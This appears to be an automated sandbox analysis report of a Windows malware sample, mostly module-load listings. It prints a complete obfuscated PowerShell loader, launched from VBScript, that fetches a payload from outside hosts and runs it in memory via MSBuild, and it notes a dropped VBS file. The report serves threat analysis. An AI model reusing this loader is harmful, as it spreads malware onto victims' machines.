                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                        Data Obfuscation

                        barindex
                        VBScript performs obfuscated calls to suspicious functions
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Run("powershell.exe $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG", "false")
                        Suspicious powershell command line found
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandledJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041BCE3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_004567E0 push eax; ret 15_2_004567FE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0045B9DD push esi; ret 15_2_0045B9E6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00455EAF push ecx; ret 15_2_00455EC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00433FF6 push ecx; ret 15_2_00434009

                        Persistence and Installation Behavior

                        barindex
                        Command shell drops VBS files
                        Source: C:\Windows\System32\cmd.exeFile created: C:\ProgramData\classers.vbsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00406128 ShellExecuteW,URLDownloadToFileW,15_2_00406128
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,15_2_00419BC4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041BCE3
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
